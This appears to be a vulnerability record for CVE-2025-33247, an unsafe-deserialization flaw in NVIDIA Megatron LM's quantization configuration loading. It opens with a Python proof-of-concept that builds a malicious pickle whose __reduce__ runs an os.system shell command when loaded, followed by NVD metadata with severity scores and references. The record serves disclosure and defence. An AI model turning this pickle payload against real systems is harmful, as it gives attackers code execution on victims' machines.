CVE-2025-33247

import pickle import os # Malicious payload to execute a shell command (e.g., creating a file) class Exploit: def __reduce__(self): # Execute 'touch /tmp/pwned' upon deserialization return (os.system, ('touch /tmp/pwned',)) # Serialize the malicious object with open('malicious_config.json', 'wb') as f: pickle.dump(Exploit(), f) print("Malicious configuration file 'malicious_config.json' generated.") print("When Megatron LM loads this file, the command will be executed.")

{"cve": {"id": "CVE-2025-33247", "sourceIdentifier": "[email protected]", "published": "2026-03-24T21:16:24.610", "lastModified": "2026-03-25T21:58:57.220", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA Megatron LM contains a vulnerability in quantization configuration loading, which could allow remote code execution. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering."}, {"lang": "es", "value": "NVIDIA Megatron LM contiene una vulnerabilidad en la carga de la configuración de cuantificación, lo que podría permitir la ejecución remota de código. Un exploit exitoso de esta vulnerabilidad podría conducir a la ejecución de código, escalada de privilegios, revelación de información y manipulación de datos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nvidia:megatron-lm:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.15.3", "matchCriteriaId": "05221D08-E8D5-4CBE-8B4E-8CE4C8176AB4"}]}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33247", "source": "[email protected]", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5769", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2025-33247", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}